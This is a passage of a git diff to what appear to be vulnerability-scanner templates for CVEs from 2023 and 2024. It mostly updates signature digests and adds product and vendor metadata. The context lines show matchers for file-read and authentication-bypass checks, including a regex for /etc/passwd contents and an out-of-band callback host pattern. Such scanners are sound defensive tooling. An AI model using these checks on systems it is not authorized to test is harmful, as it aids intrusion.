a/http/cves/2023/CVE-2023-47643.yaml b/http/cves/2023/CVE-2023-47643.yaml index 058f75a25f..da286fdd08 100644 --- a/http/cves/2023/CVE-2023-47643.yaml +++ b/http/cves/2023/CVE-2023-47643.yaml @@ -23,6 +23,8 @@ info: metadata: verified: true max-request: 2 + product: suitecrm + vendor: salesagility shodan-query: title:"SuiteCRM" tags: cve,cve2023,graphql,suitecrm,introspection @@ -62,4 +64,4 @@ http: regex: - "XSRF-TOKEN=([^;]+)" internal: true -# digest: 490a00463044022042fd88821b3d0cf12ed3ab8a1527cdb1e0c2b8d79b3731796b3985e44f3c9c3e022037295c6e96f8afc192af3131af290229632ca5e58e29528b36d4fa75bd6ac425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009867ad8a1d9d6ee3be61f018a8148d4cce2490309e5b9b91976fe18caa6b823d02204bde4220f162aeb9c5b07eb8c3a7a6fc0379c2b4408a5457efeabf457cb3f75f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index 9b3e3a38b2..d756062547 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -66,4 +66,4 @@ http: part: body words: - 'faultString' -# digest: 4a0a0047304502203045f116daa38c798fc2ed2ee40347a192233ba652d1cca7921ac59034587cb4022100f480cbea01f1635ea506c8211984d0376abbcf79f50c64f49e39b97422d0df54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204cb018d762f46c2e5e8cb350f854276c066d67c1015036226a34c6c3775f90ba022033532329a0007b50a17936c876d60125819c0ddd3c928fe9c8f7a073477f9f23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index a013b9f00d..04f7011d2b 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -69,4 +69,4 @@ http: - type: word words: - '{"issuer":' -# digest: 490a004630440220620d8681e7fcf862767d15ecc27bcdedb99c1f80425bc44176aefdf0f47e9c52022054c7b1764ce8cf3b503ace8ee80fa09fa3acabc42a4203e0270f73593ee97fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077a1993e71e5fdd1862f1a2d4aa26ebf04e622ba6bbe56becbbdec39290eaf4a022045fc84cc3e43c597238379bc66e4ff39d89c0e483283a9891d37feedd9e4328f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49785.yaml b/http/cves/2023/CVE-2023-49785.yaml index 86516eb35d..d63794ba0e 100644 --- a/http/cves/2023/CVE-2023-49785.yaml +++ b/http/cves/2023/CVE-2023-49785.yaml @@ -43,4 +43,4 @@ http: - contains(header_2,'X-Interactsh-Version') - contains(interactsh_protocol_2,'dns') condition: and -# digest: 4a0a004730450221009aef418a20ff3bbf0b2513919aab16c79ba3087163439fa0ec09b831204a3c2c02200b452345c9bd6f83f61372ddadd5b957e5775bb5e66f5008015794bb629da5a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220044ba08dbbf92281a704e216fb48e6c232f709b05709515bc4ad70388bea4317022100a9e4de43629f0f51e429598a924f63d6133561711039b0e3b7ca1cdeb64e7895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index 558bc99f35..970e880864 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c8a155f093891963e094009784bd92a6d213c2f148d37cd7692dfc877ae5167e02204a22a4d32ecf165e06558ddebe5c0494c6f8f46b4dc291cf40c7b91d1625c9d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab90dd8cf4551a04f3e326cc482e51353c3f2f56a1df3d185a4c5339cb15443302205dca7fcd5ff9fe5fe740d2681a563cebd4075d41d70f97abad4c7d2ae2e4f160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 57669fecdc..9c0ebc96d2 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -44,4 +44,4 @@ http: - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")' - 'contains(header, "application/json")' condition: and -# digest: 4b0a00483046022100893c6ca1984c2fba276be49f36d622d4654717734e62cf74b76187eec6dc2dfb022100a11a17d0ef84e22b04ba52458c3c9421f516a381874c35b1a0a59070b8b65b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df91a0e799ab437aded5b1e9356b00c8a63803525cd7a4b511a6a90c80fe4c58022100eb14a4a52eac5c1d7dceaf823ff1aab3ad05bd419e17aac856014de6121c5f37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5089.yaml b/http/cves/2023/CVE-2023-5089.yaml index c93b57dfd5..1036b74c92 100644 --- a/http/cves/2023/CVE-2023-5089.yaml +++ b/http/cves/2023/CVE-2023-5089.yaml @@ -47,4 +47,4 @@ http: - type: kval kval: - location -# digest: 490a0046304402206b16a89c762de085efbd0eb938dc018feaf844ac63c97a3238ab539451a6c45d02204334566c717d59890bef90680d58efff1ffaabb51f8f1f0beb8e0c0f0cc253dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd7d861e3f17c0f6e97ee8e723140f3d0c5ec3a282c2dd21b03bf8892b75221502210096307b8b6a2f292b107ed285cffa2143500095d5beca7867a0488e3b1ca6b8e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index 05599f5a21..2d94b93d85 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d7b19137d883d998c995b5bd36ba58deaf8fbb003bb15d3c7f810fe24d8ef047022100b8e094e9d99b5016b1289f736b020ac621cd25b0245078098df146b7d74e5b35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220595b1f4c2aad492c7ab53117f7f5878c7d2174357e2700274d277e89dc4b74c5022100ec8ce13cf48cb89871ddb8f797b38eb2776b8811e860285e586747386d5158c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index 1b8ea3347a..ac84dea108 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -62,4 +62,4 @@ http: part: header words: - 'OFBiz.Visitor=' -# digest: 490a00463044022040e378f08f425867a4da9383e75123bebf9acb790e7e3aa528b45f6d2f610be202206082fa933b506d90b7eeaf07e3ace10fbc5382b24483ab3e6a652c6c47dd9e70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac3f5290f42a5505e64248fbfea21473f85564876a36a8cec075997c1c32c826022100ce68660c0cd23db374c20b2912451c2339332565ce61a6375edb5e9d85761e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index 2a84c04f07..b8baaab188 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -48,4 +48,4 @@ http: part: header words: - 'OFBiz.Visitor=' -# digest: 4a0a004730450220639d50bb1c136f51bd9616ed67f1f2c99a8efc2e9df5055de966eb1d82f2b226022100e4a0f05b2ba7aea008f99b826c6ca3db2e89f7d5208f3dabcc18c8b862897c32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c57270ab59d7bb994c9c151f2d2fd77583f905570eabb408ebd6b13be0cb769022100f9c9673ed3529407d3fc42ccf9af89de53dae6afa4b72b939c0ad1c2c4a1e6bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index 0cd46c56a2..b038059ace 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -69,4 +69,4 @@ http: regex: - '' internal: true -# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022044f10a2ac5ef090fdbe4307044fba2814a499e32ea22d76b1574a346ff2ca1e0022100c28977b6ba6dea5cd3cc95c633cb2e6d9f06fafaf15d1a9a7ec2f5ffc35c278f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index 772ec9571b..1b175f2c8d 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -97,4 +97,4 @@ http: regex: - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php' internal: true -# digest: 490a004630440220600f4e6c39bbdaa853520acb107eb5735e178e75bd01c87538fe2cfa82491c5e022009ad67c1ba2935c8de2409f85602758457b8073739a816191d1432ffea5a8082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058942ef07bcf45ed689629dec47cb5948deebabbecb3319b821112bc3e6a891a022100cc582739251f81091738f4d4be969f2005c4f4b94462585d59d708a8ba4aad2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml index 012e6c1eef..7cb9ec08d1 100644 --- a/http/cves/2023/CVE-2023-5375.yaml +++ b/http/cves/2023/CVE-2023-5375.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' -# digest: 4b0a0048304602210095720ad27a4b59d29a0de27a36f5e41b5ebc08ba6174c07b97bd010c3e2c94d5022100a439eb8c4dd884abbb23a7a5bc79c48a0d21240e9d35572f55b62f3b638c3fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022076e656e11cb00070c5a59a08ecaad48f28beabbdfe91944e5eb2a824ca06d899022100fbd1daa4c3844c157f8a9bea25711e36c07267fe37ab3ea314e233bc14f0ea8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml index 24b0928bcc..07dd43ff62 100644 --- a/http/cves/2023/CVE-2023-5556.yaml +++ b/http/cves/2023/CVE-2023-5556.yaml @@ -98,4 +98,4 @@ http: regex: - '\/workspace\/([0-9]+)\?scriptNonce=' internal: true -# digest: 4a0a00473045022016a3ee6251af449ae1b14713bb998bf8a1a1201b692604994b8cd372d97749ab022100f82dc06b090d493a3acbd963ee4c2af281045181ad00879d31f50806a5db4ed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206ef468fce96e52210ef42ebedc016c173ff1a4381437ae9e2a655261988f671d022077243b6d2ccb046199a4b226cd7d97dff9dd6a24578ac0cca33657a26c70ad63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index 7816fe7261..51fd449d81 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -60,4 +60,4 @@ http: part: body words: - '"Authorized":false' -# digest: 4a0a0047304502201a739a9a323bb1ce5f468a13c31ecc02400b08053b2b81930e86f5decb5d83a2022100b712b21b2b241e8a04f480fe2c2b7cb3e7710265f1332dd9c2996d1a1e0cc3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e96e3f0489d007a9f47fac7ecf08b3760876b4ebe8ef9c9dd87c547303c2c9e5022073cd8996d518b5055d0c7e2c678f6e6f859a6ea0738f651b4389e54edf538ec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5914.yaml b/http/cves/2023/CVE-2023-5914.yaml index 8b83e8607c..2dbeb41235 100644 --- a/http/cves/2023/CVE-2023-5914.yaml +++ b/http/cves/2023/CVE-2023-5914.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "XmlException")' condition: and -# digest: 4b0a00483046022100c444c81b2b8b8c7685a7c8b6561444155245452a96458ce4ababf2b07efd197a022100cca7f9aa78063d40421d7bb070c601a698b3c6ea172e211040abb4bd0bb804e4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ddcc759c821d79ce4ed8806039b80715c20472a8dbffa3eab8eaa215ff25dfc3022017cdae9fbe0dcdb9504238d98a1adc34fa3b73af7cd7cfee711288bdfef500cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index f333d97416..4d957bdc53 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -67,4 +67,4 @@ http: - '"registered_model":' - '"name":' condition: and -# digest: 4a0a00473045022100f68815da7cc308b39c3de58fb2e57b06211b7e68097ee21fc1381eafbe22e9ce0220551ad63d3c0ecbb3b65fc6f7114b39694ec982e94e4b0b3fa37d855772d3e714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022052f02e7aa3838fce1739f32e8a1da643d5788b48a35c72d756224d83d73c79000220410b9ebbb1498060027b19a08cd6f423607efad2d28b3c23a5d7b2acbf2e8bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index c0e1908bd6..d88f9a08ae 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207661e85c08677d41c6ad8e62564789dfcf93f5844325d37b55fcca3c8b2ec0440220285e0cbc98eb42b5e40d936d653430b5b988836db7a145fd87b26e34288f3202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100deec5c973c35fa67721362401e0c2701d6dd8f7d163f5d156b154fe42f891b3f02206a9d4410ff07e2f051d593e77b96f6cdcc79cd0a4e279c64e15e1db1c14ffe5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 634c1469a5..1ffb9b62e9 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -56,4 +56,4 @@ http: name: nodeid json: - '..|objects|.nodeId//empty[0]' -# digest: 4a0a00473045022100ba3e6df3b44050fb0762d271ede29c53f6ee030252a737ae462953ef542a139402202f5db05e64087a458c335afe44cc11601e4bf7b72786c7e0da4ac8910d6eb812:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4fbb382aa5dd26c05c8591f16e5c16ad8d41d3f0fc6b9960483f53288f6a1c402200ba9fd061ec61c3494888eb5dff978330e66c815347dffeb9d82acea7081967f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index 1d6609a45f..e9e4cb741d 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207e6245387c45f59c7ef940262cc34d98cda99ca80a5fc524ec6be7328ed6bb95022021bd224674a2875e95881394c8a3672ea61100fa573e70d5076c60d655bd0310:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220413ca98f296d85576af9dee2201bfc9588c0bfca659b1ed6604fd9b576a2be8202203a19defaa8d6fb92815290ba857c5e6489376eac541531ed518bab9f2ff122f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 587804f2ec..57281bd29f 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -56,4 +56,4 @@ http: - 'status_code == 200' - 'contains(body, "wp-admin")' condition: and -# digest: 4a0a0047304502210093bf3e2e6772a217d1c09ef23feff29a86dcb2db0c7824b6ca669c673564321a02202f3ace02b3e57883eb764701f4c31c4a1cb5ba8cd42ea02ff8a8e23b05c547f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7bbc27951654dbca3bdf6a948dc356043e28efc07a03645748cfa66dbbb3300022100fe0227a802728849ed9f0a716c13e735cf9a337470c06bfc6ce3fd9ed0f4da77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml index a50a125088..a6f9c783c2 100644 --- a/http/cves/2023/CVE-2023-6114.yaml +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -22,6 +22,9 @@ info: cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:* metadata: max-request: 2 + product: duplicator + vendor: awesomemotive + framework: wordpress tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp http: @@ -37,4 +40,4 @@ http: - "status_code == 200" - "contains(body, '/tmp') && contains(body, 'Index of')" condition: and -# digest: 4a0a004730450221008ad8d9a52121b07607dc16ffeaf9d207133877ca69f1fb457a263e9e51f1ad4e02200ec326fcdd5c5bcde2635fe5af652c74837b86b808ed1f37861e936969af2071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eabf9219dc9e6989598a1e706ef63cba43186ef9f0414058760b4d431972d3b802210095d09270e8945a8668e0078e71b8b8acecd04475963e29c6561245d80492846f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index 2174166371..e25f728e00 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -55,4 +55,4 @@ http: - 'contains(body, "[]")' - 'duration >= 6' condition: and -# digest: 490a00463044022005758fced26b14672a273c8e91fe02b6c6ec3aa265a327705349226b7dd376fb02203c245f0dce4107f0d646a1b11bdcc024a7222baf04279972b5464db7a8b1a1a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203abe044d78eb44235d24bb992c374dfd703651411e9f993f6bd4b985c6f0348d022100be46793ecec88a8ebc27e0c913ce775aa35f2697071e4d5dede66a0a59ed24b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index 8aba6b5905..400597e957 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -55,4 +55,4 @@ http: - 'status_code == 200' - '!contains(body, "Incorrect parameters")' condition: and -# digest: 4b0a0048304602210086c70b58861dbcacdd5379b2bc2ae583c7a567f498af862782442ffc1eb6f73c022100ce44fde31cf729d55bb8e8dfe63485e2e48bf6d3eaefd277f52422db969123f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ddebbe709631857b161d91f48fcaad3cbcbcf64ac268f381b2fb06b62d443ca6022100978d207450ff4e3b1354ed0c4bd55f7f0618aeeac8be603ccce61db984c0e2cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index aee193f5da..a6e2943d61 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -42,4 +42,4 @@ http: - 'contains_all(header, "lp_session_guest=", "application/json")' - 'contains_all(body, "status\":\"success", "No courses were found")' condition: and -# digest: 4b0a00483046022100cef9dd5f4d21b7adba8e2fc2e81ff22676be552ffef32355357a0250a5649d9c022100d34a818abbae6a37188736927f54ff10f2ef4273fe4bbd32896c4d1d9811a191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085b3b5a77e87f606925cb203290c351bfd67682723d02555577f4197749a33d002203afee6ee56b4b406278f2cecc726ba148b39886cff4d5476eb0cc3775c15b319:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index cd2ac1ff30..f6dabde295 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -44,4 +44,4 @@ http: - "regex('root:.*:0:0:', body_1)" - 'contains(body_2, "Essential Blocks – Page")' condition: and -# digest: 4b0a00483046022100f990befa544138cd2d51add0c6c50c3d44a04142dc01d5bf4a2128c819e4b4ca02210094c99fbe75a212eda499e0b1d07c71f34ea341df6bdaedc34b55d474930c3461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d8c7609094a1fcc45e09dc8ebe35c75ac8395a88ae445e167670d8170179e66022100d155f3979980076224bb71384247a853423ac98c0fe216581f8f55343ee217a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6634.yaml b/http/cves/2023/CVE-2023-6634.yaml index 18caa9a22c..bcfcddafca 100644 --- a/http/cves/2023/CVE-2023-6634.yaml +++ b/http/cves/2023/CVE-2023-6634.yaml @@ -58,4 +58,4 @@ http: - "contains(body_1, '<pre>{{randstr}}</pre>') " - "status_code == 200" condition: and -# digest: 490a004630440220550b25c73341e50c05cc559445a39a1c34bbd0b62e80f3dd2c8ea5b96be0f14a022049ca8436271c7ce7a5db3904e2cfd0eb53069867d575ced5da023c8eeea05f95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9994c66149f4a5bf4f57eb82447c380b3f1676950538da499834183bc73a10d022003e36af3fb7e71968c37a7a3cbde7b2fd89d97f0bc0dd4827b652838616db3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index 353c83e713..c20de4ecb6 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 500 -# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220562372b84037c253793b1361644b96eee1ccba93418d5cd737d3aaa998b804ec0221008a4a73e79fa7039b979a9897d901eef7dc19a6503ac32ff803a078f3c61485f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index b628e62b4c..5bfecacd98 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -64,4 +64,4 @@ http: - 'contains_all(body_2, "success\":true,", "{\"fcm_token\":\"{{fcm_token}}")' - 'contains_all(body_3, "true,\"data\":", "access_token=")' condition: and -# digest: 490a00463044022052e2d47410166741386ebe8b81a814aab4398a9e44a1de8956e16fb2d841a32702204a2a826d63516a639225994c25bcb3fffdacbb6cd652f4ae042060edc624ea57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df1311e0648c5c0c2297cad9b5527b9c111d611cf4b9f990fdea564c1ff5c4cc02202ce1f58dc34dd57604eef2926b33b969069290c0f03ffabb7af0be0f90fea60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index 9dbf68e90e..21a29b80a6 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100856a1265a2b1f7a9008f06a91028f1251bbc41933803d4a97ed9d4c8aecc5247022021ae317abdd577d7e1bec31bf9363b753309823e162396436761eae9ec1957c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009e5f6f58822279125780718555791f922c2ad0666d25b6f4968041dffbdaceca0220237fc1deabec0aa7764f6ff4be202849488aa19da84dcdcfb287fc8e8a7f7543:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index 1d6b1c002f..fe4e77c554 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -94,4 +94,4 @@ http: json: - '.run.info.run_id' internal: true -# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022062e417739d10a0345e088ba046630f61c75a6fb7c2640786cae6d7fe70c113da0220798d1ffc7b82d974779f27319ed421eb30bafdb7d6a1dbc125edc69436bef5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index 7fd4a975aa..2eb799cbbc 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204f18769cab2fa4eb32a2427aa828db58f7c1e55edbd4753e39f2b2c1358d69460221008d36c427706e6fa362ce0978a6ea757aac2831412020b06cbd14cb7abe8045b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c8c97c275094e88344019f80ab5824b9d657171e092d085f48ff32a61c3bcf2022100e3ee293e0e93fe88e0838ff2ab71274a68e6cd4ffdf9bc9f50e58b9bd30a4b11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index 9d76227636..c32fd0979b 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea5def08f715f10de504aa6ce18ad04cacecb0c765bde71610bf63d69e20723d022100f99fd48f764f8c780fec72cc54c5b6adb89355a71600c964df2453a19aab63b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220581efe02eb9cd3ada112546fde3dc7479baecfc944f62b46161092c26a8ea386022100938435bdc92e8db29976fbb000eb51a136a70541574c87c832a83b2b1f87ced1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0305.yaml b/http/cves/2024/CVE-2024-0305.yaml index f3bbabb49e..9305b5e307 100644 --- a/http/cves/2024/CVE-2024-0305.yaml +++ b/http/cves/2024/CVE-2024-0305.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207fea590b5f6bf722200ca68b8832b7c0d3a272c55c2c93cc238fef99772514d0022100b0ca7e5f0234813a63935fa5767fe9d688e5e741e2cd658b5cb02f79d241a220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015e3b88f751e5eecf33a42035bdf0113bdc40dab4f2bb7b7585a58b07a2a3f8c02205a2cf5822cfe9758202ab4fc426fb99e6e702ab31c6ebd5c14e720ae82d26a02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index b6b5b06d0c..67a8072a14 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 